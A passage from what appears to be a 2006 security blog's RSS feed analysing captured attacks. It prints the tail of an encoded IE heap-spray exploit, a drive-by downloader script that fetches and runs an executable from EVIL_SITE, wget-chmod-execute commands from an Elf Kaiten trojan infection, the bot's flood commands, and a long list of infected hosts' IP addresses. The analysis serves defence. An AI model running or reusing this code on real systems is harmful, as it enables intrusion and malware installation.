7,117,53,51,50,52,37,117,53,50,53,49,37,117,53,55,53,54,37,117,101,99,98,57,37,117,48,50,48,102,37,117,56,98,48,48,37,117,56,53,49,57,37,117,55,53,100,98,37,117,51,51,53,48,37,117,51,51,99,57,37,117,56,51,100,98,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,49,53,37,117,55,53,48,48,37,117,56,51,51,101,37,117,48,54,101,56,37,117,98,55,48,102,37,117,56,49,49,56,37,117,102,102,102,98,37,117,48,48,51,53,37,117,55,53,48,48,37,117,56,51,51,48,37,117,48,50,101,56,37,117,98,55,48,102,37,117,56,51,49,56,37,117,54,97,102,98,37,117,50,53,55,53,37,117,99,48,56,51,37,117,56,98,48,52,37,117,98,56,51,48,37,117,48,102,101,48,37,117,48,48,48,50,37,117,48,48,54,56,37,117,48,48,48,48,37,117,54,56,48,49,37,117,49,48,48,48,37,117,48,48,48,48,37,117,48,48,54,97,37,117,49,48,102,102,37,117,48,54,56,57,37,117,52,52,56,57,37,117,49,56,50,52,37,117,101,99,98,57,37,117,48,50,48,102,37,117,102,102,48,48,37,117,53,102,48,49,37,117,53,97,53,101,37,117,53,98,53,57,37,117,101,52,98,56,37,117,48,50,48,102,37,117,102,102,48,48,37,117,101,56,50,48,37,117,102,100,100,97,37,117,102,102,102,102,34,41,59,13,10,104,111,109,101,61,117,110,101,115,99,97,112,101,40,34,37,117,55,52,54,56,37,117,55,48,55,52,37,117,50,102,51,97,37,117,54,51,50,102,37,117,54,49,54,57,37,117,54,54,50,101,37,117,54,57,54,50,37,117,54,102,50,101,37,117,54,55,55,50,37,117,54,51,50,101,37,117,50,102,54,101,37,117,55,51,54,51,37,117,50,101,54,101,37,117,55,56,54,53,37,117,48,48,54,53,37,117,48,48,48,48,34,41,59,13,10,114,117,110,110,97,98,108,101,32,61,32,112,97,121,108,111,97,100,43,104,111,109,101,59,32,115,107,105,112,112,101,114,32,61,32,117,110,101,115,99,97,112,101,40,34,37,117,52,56,52,56,37,117,52,56,52,56,34,41,59,13,10,119,104,105,108,101,32,40,115,107,105,112,112,101,114,46,108,101,110,103,116,104,60,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,32,123,32,32,115,107,105,112,112,101,114,43,61,115,107,105,112,112,101,114,59,32,125,13,10,115,107,105,112,112,101,114,49,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,50,48,43,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,115,107,105,112,112,101,114,50,32,61,32,115,107,105,112,112,101,114,46,115,117,98,115,116,114,105,110,103,40,48,44,32,115,107,105,112,112,101,114,46,108,101,110,103,116,104,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,59,13,10,119,104,105,108,101,40,115,107,105,112,112,101,114,50,46,108,101,110,103,116,104,60,40,48,120,52,48,48,48,48,45,50,48,45,114,117,110,110,97,98,108,101,46,108,101,110,103,116,104,41,41,32,123,32,32,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,50,59,13,10,115,107,105,112,112,101,114,50,32,43,61,32,115,107,105,112,112,101,114,49,59,32,125,32,99,111,110,116,101,120,116,32,61,32,110,101,119,32,65,114,114,97,121,40,41,59,32,105,105,61,45,49,59,32,119,104,105,108,101,40,43,43,105,105,60,51,48,48,41,13,10,123,32,32,99,111,110,116,101,120,116,91,105,105,93,32,61,32,115,107,105,112,112,101,114,50,32,43,32,114,117,110,110,97,98,108,101,59,32,125,32,71,111,116,73,116,40,41,59,125,102,117,110,99,116,105,111,110,32,116,101,115,116,40,41,123,32,97,108,101,114,116,40,41,59,125,60,47,83,67,82,73,80,84,62&#8243;<br />
t=eval(&#8221;String.fromCharCode(&#8221;+t+&#8221;)&#8221;);<br />
document.write(t);<br />
&lt;/script&gt;<br />
&lt;/HEAD&gt;&lt;BODY onload=BuildContext();&gt;<br />
&lt;BUTTON id=x onclick=ClickTo();&gt;<br />
&lt;/BUTTON&gt;<br />
</textarea></p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/12/24/internethhctrl1-exploit/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>another variation of drive by downloaders</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/12/24/another-variation-of-drive-by-downloaders/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/12/24/another-variation-of-drive-by-downloaders/#comments</comments>
		<pubDate>Sun, 24 Dec 2006 13:41:10 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Digital Warfare]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/12/24/another-variation-of-drive-by-downloa</guid>
		<description><![CDATA[The exploit  used is fairly old.  One other important thing to note is that the CLSID used here is a Microsoft  database control.  
[zero@day testing]$ curl  http://EVIL_SITE/db/wm.htm
&#60;script&#62;
var url,path;
url="http://EVIL_SITE/mc/game/db.exe";
path="C:\\boot.exe";
try{
 var ado=(document.createElement("object"));
 var d=1;
 ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
 var e=1;
 var xml=ado.CreateObject("Microsoft.XMLHTTP","");
 var f=1;
 var ab="Adodb.";
 var cd="Stream";
 var g=1;
 var as=ado.createobject(ab+cd,"");
 var h=1;
 xml.Open("GET",url,0);
 [...]]]></description>
			<content:encoded><![CDATA[<p>The <a href="http://www.milw0rm.com/exploits/2052">exploit </a> used is fairly old.  One other important thing to note is that the CLSID used here is a Microsoft <a href="http://www.microsoft.com/windows2000/en/server/iis/default.asp?url=/windows2000/en/server/iis/htm/asp/eadg9mp1.htm"> database control</a>.  </p>
<p><code>[zero@day testing]$ curl  http://EVIL_SITE/db/wm.htm<br />
&lt;script&gt;<br />
var url,path;<br />
url="http://EVIL_SITE/mc/game/db.exe";<br />
path="C:\\boot.exe";<br />
try{<br />
 var ado=(document.createElement("object"));<br />
 var d=1;<br />
 ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");<br />
 var e=1;<br />
 var xml=ado.CreateObject("Microsoft.XMLHTTP","");<br />
 var f=1;<br />
 var ab="Adodb.";<br />
 var cd="Stream";<br />
 var g=1;<br />
 var as=ado.createobject(ab+cd,"");<br />
 var h=1;<br />
 xml.Open("GET",url,0);<br />
 xml.Send();<br />
 as.type=1;<br />
 var n=1;<br />
 as.open();<br />
 as.write(xml.responseBody);<br />
 as.savetofile(path,2);<br />
 as.close();<br />
 var shell=ado.createobject("Shell.Application","");<br />
 shell.ShellExecute(path,"","","open",0);<br />
}<br />
catch(e){}<br />
;&lt;/script&gt;</code></p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/12/24/another-variation-of-drive-by-downloaders/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>Hi, I&#8217;m a Mac</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/09/01/hi-im-a-mac/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/09/01/hi-im-a-mac/#comments</comments>
		<pubDate>Fri, 01 Sep 2006 16:08:40 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[zeroday]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/09/01/hi-im-a-mac/</guid>
		<description><![CDATA[And I can get 0wned just like you PC.  
* ImageIO
CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465
Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079
Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution
Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), [...]]]></description>
			<content:encoded><![CDATA[<p>And I can get 0wned just like you PC.  </p>
<p>* ImageIO</p>
<p><em>CVE-ID: CVE-2006-3459, CVE-2006-3461, CVE-2006-3462, CVE-2006-3465</em></p>
<p>Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079</p>
<p><strong>Impact: Viewing a maliciously-crafted TIFF image may lead to an application crash or arbitrary code execution</strong></p>
<p>Description: Buffer overflows were discovered in TIFF tag handling (CVE-2006-3459, CVE-2006-3465), the TIFF PixarLog decoder (CVE-2006-3461), and the TIFF NeXT RLE decoder (CVE-2006-3462). By carefully crafting a corrupt TIFF image, an attacker can trigger a buffer overflow which may lead to an application crash or arbitrary code execution. This update addresses the issue by performing additional validation of TIFF images. Systems prior to Mac OS X v10.4 are affected only by the TIFF NeXT RLE decoder issue (CVE-2006-3462). Credit to Tavis Ormandy, Google Security Team for reporting this issue.</p>
<p>Note:A fifth issue discovered by Tavis Ormandy, CVE-2006-3460, does not affect Mac OS X.</p>
<p> * OpenSSH</p>
<p>CVE-ID: CVE-2006-0393</p>
<p>Available for: Mac OS X v10.4.7 Build 8K1079, Mac OS X Server v10.4.7 Build 8K1079<br />
<strong><br />
Impact: When remote login is enabled, remote attackers may cause a denial of service or determine whether an account exists</strong></p>
<p>Description: Attempting to log in to an OpenSSH server (&#8221;Remote Login&#8221;) using a nonexistent account causes the authentication process to hang. An attacker can exploit this behavior to detect the existence of a particular account. A large number of such attempts may lead to a denial of service. This update addresses the issue by properly handling attempted logins by nonexistent users. This issue does not affect systems prior to Mac OS X v10.4. Credit to Rob Middleton of the Centenary Institute (Sydney, Australia) for reporting this issue.</p>
]]></content:encoded>
			<wfw:commentRss>http://blogs.law.harvard.edu/zeroday/2006/09/01/hi-im-a-mac/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-sa/3.0/</creativeCommons:license>
	</item>
		<item>
		<title>More attacks on my web server [Elf Kaiten.AQ]</title>
		<link>http://blogs.law.harvard.edu/zeroday/2006/06/05/more-attacks-on-my-web-server/</link>
		<comments>http://blogs.law.harvard.edu/zeroday/2006/06/05/more-attacks-on-my-web-server/#comments</comments>
		<pubDate>Mon, 05 Jun 2006 05:02:37 +0000</pubDate>
		<dc:creator>zeroday</dc:creator>
				<category><![CDATA[Digital Warfare]]></category>
		<category><![CDATA[Vulnerabilities]]></category>
		<category><![CDATA[zeroday]]></category>

		<guid isPermaLink="false">http://blogs.law.harvard.edu/zeroday/2006/06/05/more-attacks-on-my-web-server/</guid>
		<description><![CDATA[the same as the last one which was based on Mambo (open source CMS).  This time I was able to pull the files down in time.
EDIT: More information here
documented by enkrypted
UPDATE: Secunia reports this as Elf Kaiten.AQ
TrendMicro reports the trojan but the statistics are horribly wrong.  Just the channel I&#8217;m monitoring alone has [...]]]></description>
			<content:encoded><![CDATA[<p>the same as the last one which was based on Mambo (open source CMS).  This time I was able to pull the files down in time.<br />
EDIT: <a href="http://ghetto.org/~enkrypted/newchrousty/">More information here<br />
documented by enkrypted</a><br />
UPDATE: <a href="http://secunia.com/virus_information/29599/elfkaiten.aq/">Secunia reports this as Elf Kaiten.AQ</a><br />
<a href="http://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=ELF%5FKAITEN%2EAQ&amp;VSect=S">TrendMicro reports the trojan but the statistics are horribly wrong.  Just the channel I&#8217;m monitoring alone has seen hundreads of infections via Mambo</a></p>
<p>wget 72.18.195.161/lnikon</p>
<p>This leads to a small script which executes the following:<br />
cd /tmp<br />
mkdir .font-jix<br />
cd .font-jix<br />
wget 72.18.195.161/linux-kernel<br />
chmod +x linux-kernel<br />
./linux-kernel<br />
cd /tmp<br />
cd .font-jix<br />
wget 72.18.195.161/linux-mkdir<br />
chmod +x linux-mkdir<br />
./linux-mkdir</p>
<p>I won&#8217;t paste the strings results from the files here but sufficed to say it&#8217;s headed towards an irc server.  I did find these servers listed:<br />
67.43.234.119<br />
&nbsp;<a href="http://irc.newchrousty.org" title="http://irc.newchrousty.<br />
" target="_blank">irc.newchrousty.org</a><br />
&nbsp;<a href="http://Sympatico.Qc.Ca.NewChrousty.org" title="http://Sympatico.Qc.Ca.NewChrousty.<br />
" target="_blank">Sympatico.Qc.Ca.NewChrousty.org</a><br />
&nbsp;<a href="http://Trois-Rivieres.Qc.Ca.NewChrousty.org" title="http://Trois-Rivieres.Qc.Ca.NewChrousty.<br />
" target="_blank">Trois-Rivieres.Qc.Ca.NewChrousty.org</a><br />
&nbsp;<a href="http://Chat.NewChrousty.Org" title="http://Chat.NewChrousty.<br />
" target="_blank">Chat.NewChrousty.Org</a><br />
&nbsp;<a href="http://Micro-ISP.NewChrousty.Org" title="http://Micro-ISP.NewChrousty.<br />
" target="_blank">Micro-ISP.NewChrousty.Org</a><br />
&nbsp;<a href="http://LaLiPuS.NewChrousty.Org" title="http://LaLiPuS.NewChrousty.<br />
" target="_blank">LaLiPuS.NewChrousty.Org</a></p>
<p>Some other interesting strings:<br />
NOTICE %s :PAN<br />
NOTICE %s :Panning %s.<br />
NOTICE %s :TSUNAMI<br />
NOTICE %s :Tsunami heading for %s.<br />
NOTICE %s :What kind of subnet address is that? Do something like: 169.40<br />
NOTICE %s :TSUNAMI                            = Special packeter that wont be blocked by most firewalls<br />
NOTICE %s :PAN                          = An advanced syn flooder that will kill most network drivers<br />
NOTICE %s :UDP                          = A udp flooder<br />
NOTICE %s :UNKNOWN                            = Another non-spoof udp flooder<br />
NOTICE %s :NICK                                       = Changes the nick of the client<br />
NOTICE %s :SERVER                                   = Changes servers<br />
NOTICE %s :GETSPOOFS                                        = Gets the current spoofing<br />
NOTICE %s :SPOOFS                                   = Changes spoofing to a subnet<br />
NOTICE %s :DISABLE                                          = Disables all packeting from this client<br />
NOTICE %s :ENABLE                                           = Enables all packeting from this client<br />
NOTICE %s :KILL                                             = Kills the client<br />
NOTICE %s :GET       = Downloads a file off the web and saves it onto the hd<br />
NOTICE %s :VERSION                                    = Requests version of client<br />
NOTICE %s :KILLALL                                      = Kills all current packeting<br />
NOTICE %s :HELP                                          = Displays this<br />
NOTICE %s :IRC                            = Sends this command to the server<br />
NOTICE %s :SH                             = Executes a command</p>
<p>UPDATE: Everything goes to a channel called #mambolizo with password &#8216;leet&#8217;<br />
Here is a sample of infected IP&#8217;s</p>
<p>#mambolizo AUSTI H ~KVDJQ@81.192.114.78 (ZVYRRUU)<br />
#mambolizo AXEUGVS H ~RUSC@80.71.219.42 (NUVQT)<br />
#mambolizo AZBCPAT H ~QTBQJGAH@217.126.24.185 (LVNVG)<br />
#mambolizo Aarh H ~discern@63.89.31.130 (silenc)<br />
#mambolizo Aarhu H ~sett@63.89.31.130 (chef)<br />
#mambolizo Aarhus H ~psych@63.89.31.130 (Aarhus)<br />
#mambolizo BDMIO H ~EHKFTIRL@81.15.157.171 (DJVB)<br />
#mambolizo BEUKTL H ~WCBJMEWJ@81.223.209.211 (EHTSVU)<br />
#mambolizo BFFENJ H ~HZTMPV@217.157.235.41 (KWTE)<br />
#mambolizo BFJEK H ~TFPS@213.55.30.241 (AZOSUKK)<br />
#mambolizo BGYUO H ~QLOJD@193.157.66.96 (HJCRMV)<br />
#mambolizo BLFDWBC H ~IGNYV@69.60.124.43 (UIQP)<br />
#mambolizo BLMWK H ~PFWTCHIQ@202.155.6.237 (LAZYZN)<br />
#mambolizo BMJQF H &nbsp;<a href="mailto:network@68.51.46.205" title="mailto:network@68.51.46.205">network at 68.51.46.205</a> (UNSRD)<br />
#mambolizo BPIJ H ~AWWLXM@202.83.174.36 (PMTFK)<br />
#mambolizo BPPTPSN H ~ALCTDEWH@85.17.6.163 (YXQDAYQ)<br />
#mambolizo BUXL H ~FBGNOOO@68.189.182.37 (VCGZ)<br />
#mambolizo BXXMOK H ~ZBDKNNE@202.129.46.90 (GSWTDH)<br />
#mambolizo CAHI H ~MTCSU@129.105.249.208 (JMLZ)<br />
#mambolizo CAIZFQV H ~QPRM@82.165.177.236 (FODPLD)<br />
#mambolizo CBZYU H ~AFBZKZ@85.20.35.66 (PFBBQXJR)<br />
#mambolizo CCMLG H ~QSZKPUD@194.106.17.163 (DGLJLZD)<br />
#mambolizo CCQPE H ~RELLEXA@61.220.191.21 (NTLI)<br />
#mambolizo CCQRYBDM H ~FGHQRKAZ@24.63.215.68 (KFYBYOPR)<br />
#mambolizo CDDDJBKB H ~DHXFP@201.217.215.66 (SWCVII)<br />
#mambolizo CFGXYWV H ~THCRIR@85.124.118.43 (GFDWO)<br />
#mambolizo CHABLA H ~XFGRR@193.157.66.96 (JDXK)<br />
#mambolizo CHDQT H ~YUVWLSI@62.90.45.58 (BVLS)<br />
#mambolizo CIUKSB H ~IGYF@207.170.12.72 (WUJHUJSG)<br />
#mambolizo CLOAVSF H ~KPILEJS@213.55.30.241 (FPTVTLKI)<br />
#mambolizo CLSA H ~ARZIVGWJ@24.63.215.68 (XXPG)<br />
#mambolizo CTEM H ~VCDHTEE@130.234.7.72 (HKHTFIA)<br />
#mambolizo CUKXSY H ~SDZLBNG@193.95.249.225 (JLGZS)<br />
#mambolizo CUPKX H ~SIIEQCX@201.224.164.91 (LLVKOKO)<br />
#mambolizo CWYKTNJ H ~QVPP@61.178.85.114 (BXUPLXM)<br />
#mambolizo CXOWBXKI H ~ZJPVHC@213.55.30.241 (QZJP)<br />
#mambolizo CZZPVI H ~JMCL@68.143.64.178 (HFQWJH)<br />
#mambolizo DANMLPKU H ~JMGVKQ@61.220.191.9 (WGCJWERN)<br />
#mambolizo DATECLLS H &nbsp;<a href="mailto:www-data@217.126.49.173" title="mailto:www-data@217.126.49.173">www-data at 217.126.49.173</a> (XQHI)<br />
#mambolizo DBBHZ H ~NTUT@203.55.23.51 (FTOMOL)<br />
#mambolizo DIJZMBU H ~RECI@196.209.16.57 (KJTY)<br />
#mambolizo DIKOUW H ~WVRFYL@24.28.88.134 (VKVLXCSJ)<br />
#mambolizo DLIWY H &nbsp;<a href="mailto:www-data@62.94.123.42" title="mailto:www-data@62.94.123.42">www-data at 62.94.123.42</a> (QPZN)<br />
#mambolizo DOWC H ~ZVJL@213.55.30.241 (OPKSJ)<br />
#mambolizo DRKGEP H ~QRYV@69.40.247.160 (RAEGOPKP)<br />
#mambolizo DYFTYUG H ~GGDRNI@213.225.48.85 (GBVJOKOF)<br />
#mambolizo DYZDB H ~CNLNG@193.157.66.96 (GDVKBW)<br />
#mambolizo DZFZOVII H ~VSHPVG@84.170.216.17 (JHXUMND)<br />
#mambolizo DZRU H ~JXCHPQX@202.143.173.83 (JRIRFKAJ)<br />
#mambolizo EAISZOUV H &nbsp;<a href="mailto:hidden-use@163.21.50.253" title="mailto:hidden-use@163.21.50.253">hidden-use at 163.21.50.253</a> (ZWQPAHN)<br />
#mambolizo EARBYA H ~DEIF@130.13.141.109 (EIRJLAMR)<br />
#mambolizo EARBYG H ~TPRULQW@213.243.33.117 (XJDI)<br />
#mambolizo EGTE H ~RWBHQPDH@218.226.219.50 (LNIK)<br />
#mambolizo ELTKP H ~ZEDEQK@83.30.227.15 (NNUKQM)<br />
#mambolizo EMJD H ~BPLL@83.133.81.92 (FIARDNC)<br />
#mambolizo EQBPZKH H ~JELWXQG@67.161.213.233 (HYDRCKDU)<br />
#mambolizo EQPL H ~JJXJ@202.143.101.131 (DNHJQW)<br />
#mambolizo FCWJE H ~JQLN@203.172.129.2 (VNSFD)<br />
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.201 (PIKEA)<br />
#mambolizo FGPBYTK H ~YJOKZQ@203.55.23.51 (PIKEA)<br />
#mambolizo FKTN H ~FENLCJWQ@194.106.17.163 (FQWXA)<br />
#mambolizo FPQXF H ~KOGHXI@81.223.209.211 (HMDH)<br />
#mambolizo FUDJ H ~LDKVXAK@208.200.133.2 (GCDVMC)<br />
#mambolizo GDBUUEX H ~VKOK@217.149.127.14 (FHFKBT)<br />
#mambolizo GDBYKPKT H ~FCVFJCOB@69.60.124.43 (LGITHJ)<br />
#mambolizo GDZJWT H ~OVFVDTWX@84.57.40.96 (YFXKHJ)<br />
#mambolizo GEQNJVP H ~LILIWKOF@213.243.33.117 (EGMHFA)<br />
#mambolizo GGCBZ H ~AOLZC@140.113.214.180 (CWAB)<br />
#mambolizo GJATO H ~QSEK@82.151.192.61 (AGQPV)<br />
#mambolizo GKHJX H ~WFXYXSI@201.135.134.24 (CTYSG)<br />
#mambolizo GLUGHMP H ~LTDVBWSE@130.94.124.180 (FBWJ)<br />
#mambolizo GOTTSJXC H ~MICTUNNR@61.183.207.183 (NFPBHG)<br />
#mambolizo GUAOBGG H ~MKVQSWY@147.123.155.1 (CMSRZ)<br />
#mambolizo GUYW H ~PAGXEM@67.53.244.228 (XTIN)<br />
#mambolizo GXVAAI H ~VMPX@81.185.145.216 (AVTYXUBA)<br />
#mambolizo GZHEFEG H ~LMVQXFJF@61.183.207.183 (NUNDDSEG)<br />
#mambolizo HAZBZF H ~TSPKOA@202.51.31.246 (IQIKO)<br />
#mambolizo HFPSGS H ~BZMUKKGZ@66.77.26.70 (GLKAKIC)<br />
#mambolizo HYHHWVZ H ~PJBGTB@151.42.226.237 (YASI)<br />
#mambolizo IAMARBMY H ~XTEKZPG@210.173.173.29 (XJNJIYOD)<br />
#mambolizo ICIPEYX H ~PVEBNWFZ@217.126.233.168 (ABUTYCLZ)<br />
#mambolizo ICJQTBW H ~LAKULZNH@206.248.136.95 (AXTOOZY)<br />
#mambolizo IJBTV H ~COZRLFS@83.18.171.82 (ISALRYV)<br />
#mambolizo IKJAJ H ~DPGY@201.102.71.14 (CAJMCB)<br />
#mambolizo IOUEJS H ~PKVY@201.135.134.24 (FEGH)<br />
#mambolizo IVOCSE H ~QPLT@82.149.166.130 (JZWLWXG)<br />
#mambolizo IWJCB H ~TFDKHNL@81.235.163.148 (TWNSMVC)<br />
#mambolizo JFKDMPW H ~PRWEH@149.156.5.206 (TLUWXDR)<br />
#mambolizo JGQCU H ~YYMEHSAP@217.194.97.70 (SZEJFKNQ)<br />
#mambolizo JSUVEF H ~XWCUGCY@83.18.171.82 (TYOVFQH)<br />
#mambolizo JTGX H ~WRTL@65.75.138.190 (RNFX)<br />
#mambolizo KAJXDC H ~XUPPT@213.169.62.179 (TWSP)<br />
#mambolizo KARLYLG H ~OXHGW@69.60.124.43 (AHQJPJB)<br />
#mambolizo KEMP H ~FDCL@80.32.194.218 (RYXZDOFZ)<br />
#mambolizo KENLHRT H ~SKGU@219.117.251.138 (MFXC)<br />
#mambolizo KJUFOM H ~ZCNFYM@82.226.252.2 (FQCMBT)<br />
#mambolizo KNMH H ~UCSYGE@203.125.140.52 (NXOSOEM)<br />
#mambolizo KOZPTXL H ~LQROMHV@209.200.14.230 (PZNP)<br />
#mambolizo KUBVHXA H ~RVOKD@202.155.108.36 (OOCQBL)<br />
#mambolizo KVNE H ~FYZCCF@69.159.203.110 (XTCRZ)<br />
#mambolizo LCVNCLWI H ~CYCBXJM@203.219.147.14 (PSCRO)<br />
#mambolizo LJBNJPR H ~YYFQIM@194.106.17.163 (ORKU)<br />
#mambolizo LKQOBCR H ~UFCAXS@83.109.10.152 (FDQXQ)<br />
#mambolizo LMXMHIL H ~PAMUKHBU@84.157.157.8 (DRTX)<br />
#mambolizo LUMI H ~DUSGPLUQ@61.178.85.114 (XLCDPC)<br />
#mambolizo LWNPI H ~XKDFDUFZ@83.133.81.92 (VBUPE)<br />
#mambolizo MDSZWP H ~KOFUXKDT@64.146.134.133 (AMLM)<br />
#mambolizo MNJVN H ~KPPEKY@65.204.137.200 (FRTRJRX)<br />
#mambolizo MNLTYGNB H ~DZOEL@85.53.64.206 (IMQTC)<br />
#mambolizo MQOFNW H ~GZGC@66.77.26.70 (RVBZQMCR)<br />
#mambolizo MSQQKO H ~GZVTAMV@209.200.14.230 (XZXWNV)<br />
#mambolizo MUVF H ~RAPR@202.172.54.61 (KCMSZSAP)<br />
#mambolizo NDVC H ~IDIY@207.225.61.10 (AERF)<br />
#mambolizo NFRC H ~JZBF@80.34.96.60 (BVFMEPT)<br />
#mambolizo NHGZ H ~HSOOIPV@195.117.103.58 (HARGJ)<br />
#mambolizo NNCXJJUD H ~ULST@81.241.202.21 (FLDSMSFH)<br />
#mambolizo NOBMQ H ~GMHFK@69.64.49.62 (PWPRV)<br />
#mambolizo NQQG H ~NOUP@66.77.26.70 (LMYTO)<br />
#mambolizo NQUUBED H ~SSTLZW@81.223.209.211 (RGAOYT)<br />
#mambolizo NSFCMC H ~EMVAI@203.55.23.201 (VHGIDT)<br />
#mambolizo NSFCMC H ~EMVAI@203.55.23.51 (VHGIDT)<br />
#mambolizo OHIJSLD H ~RKFDPEQ@217.194.97.70 (XDZP)<br />
#mambolizo OKMBMPZH H ~CGYYJU@213.55.30.241 (EJPRHUP)<br />
#mambolizo OOZGM H ~RMWD@84.87.219.36 (UMRTUVJ)<br />
#mambolizo OQBIPNE H ~FRBI@12.36.175.159 (HLNUXRE)<br />
#mambolizo OSUFFLN H ~CDWR@81.57.87.84 (SSFILJM)<br />
#mambolizo OWWX H ~PYSCZ@66.160.135.87 (SEEG)<br />
#mambolizo OXBQOHG H ~ESDIGP@195.117.179.10 (IRMB)<br />
#mambolizo OYXU H ~RLCKXFI@193.170.41.50 (VYBMH)<br />
#mambolizo OZAW H ~EEARLYDZ@194.144.126.233 (GFQVEZ)<br />
#mambolizo PESOQIV H ~QBETMCB@82.236.226.54 (VFPMBQRE)<br />
#mambolizo PFJOZ H ~ZLPNODPB@141.21.7.60 (VDIW)<br />
#mambolizo PFVHK H ~PFGR@217.206.217.199 (XXIO)<br />
#mambolizo PHQWJN H ~SSNITPJ@203.55.23.201 (KOZVB)<br />
#mambolizo PVZB H ~EHDJJNT@82.226.118.139 (KRMNB)<br />
#mambolizo PZAHGJI H ~MDVPQJV@202.143.173.83 (BYTLFC)<br />
#mambolizo QBUITDX H ~DZOEL@85.53.64.206 (IMQTC)<br />
#mambolizo QDCNYMS H ~HFXJM@64.242.180.2 (JSNAOR)<br />
#mambolizo QNHPC H &nbsp;<a href="mailto:www-data@149.156.124.6" title="mailto:www-data@149.156.124.6">www-data at 149.156.124.6</a> (GWTJQULB)<br />
#mambolizo QUENMWN H ~BFKTK@24.31.6.188 (MQQV)<br />
#mambolizo QYUEMXD H ~TAIK@213.54.172.75 (YSZEWBU)<br />
#mambolizo QYUEMXD H ~TAIK@85.212.30.189 (YSZEWBU)<br />
#mambolizo RAOBFQ H ~SBYWMC@61.7.147.47 (YPVFVERO)<br />
#mambolizo RBOVLKIT H ~ZKGEC@81.209.59.194 (HKEXGZ)<br />
#mambolizo RBXWI H ~OPVPGPU@217.170.13.48 (VPWRI)<br />
#mambolizo RCPQMAKE H ~EEGGOQ@213.228.166.47 (BAFQV)<br />
#mambolizo RDHFDU H ~ITBNE@82.155.145.235 (XYKWRWKZ)<br />
#mambolizo RGDFZTMA H ~ZVZKTVVL@64.76.81.153 (FCQZ)<br />
#mambolizo RJOWRVQB H ~NBJH@193.68.47.28 (ONOFS)<br />
#mambolizo RMOSO H ~QOVPYK@201.17.175.51 (MHRRMUB)<br />
#mambolizo ROWA H ~WJNHEAIZ@130.94.124.180 (CSETK)<br />
#mambolizo RQYEFCO H ~PRGHXC@80.32.194.218 (XFBCC)<br />
#mambolizo RSYGMGNZ H ~PUAQLO@193.40.142.254 (GUAD)<br />
#mambolizo RUJG H ~ACVZ@68.189.182.37 (FLTABBA)<br />
#mambolizo RXBV H ~MZUW@217.227.216.244 (AFVWDV)<br />
#mambolizo RXBV H ~MZUW@217.227.226.182 (AFVWDV)<br />
#mambolizo RZYDFBT H ~SGEOXUL@217.170.13.48 (NOPBQH)<br />
#mambolizo SAURG H ~FDKKWST@193.170.41.50 (VHKN)<br />
#mambolizo SBUXGR H ~AOLZC@140.113.214.180 (CWAB)<br />
#mambolizo SCLT H ~TIQCMYV@217.206.217.199 (KHXRV)<br />
#mambolizo SDXL H ~YMJVN@194.210.98.160 (XMCLL)<br />
#mambolizo SEVRKJE H ~DNPT@83.28.39.209 (CUUPNS)<br />
#mambolizo SEXWCEP H ~CRZBRIS@194.242.112.72 (EFUV)<br />
#mambolizo SGLVRMEC H &nbsp;<a href="mailto:hidden-use@163.21.50.253" title="mailto:hidden-use@163.21.50.253">hidden-use at 163.21.50.253</a> (RJLCLPZH)<br />
#mambolizo SHDEMF H ~ODWMB@217.194.97.70 (YBMJJ)<br />
#mambolizo SKAZE H ~EPCVZOKX@218.208.118.66 (SALC)<br />
#mambolizo SKFIJTQ H ~VQFM@217.194.97.70 (QTXSSIWL)<br />
#mambolizo SLBV H ~UDCWYGU@141.21.7.60 (NWESN)<br />
#mambolizo SNJJRJNW H ~AYMTX@84.157.129.23 (GEDSORSY)<br />
#mambolizo SNJJRJNW H ~AYMTX@84.157.197.113 (GEDSORSY)<br />
#mambolizo SNUK H ~KTACK@209.200.14.230 (RYCBPV)<br />
#mambolizo SPDR H ~GJOTW@209.172.33.199 (BZSAJMBC)<br />
#mambolizo SSCDAPCS H ~FBBCYTAU@61.178.85.114 (VHALHLC)<br />
#mambolizo SSQGHMH H ~VJVO@87.78.22.107 (MIPBN)<br />
#mambolizo SSSZEAD H ~VAHAR@213.225.48.85 (YEAQJL)<br />
#mambolizo TCJJXJ H ~TFPS@62.217.143.90 (AZOSUKK)<br />
#mambolizo TCJS H ~PIHOXNG@196.28.49.199 (JXUMUDP)<br />
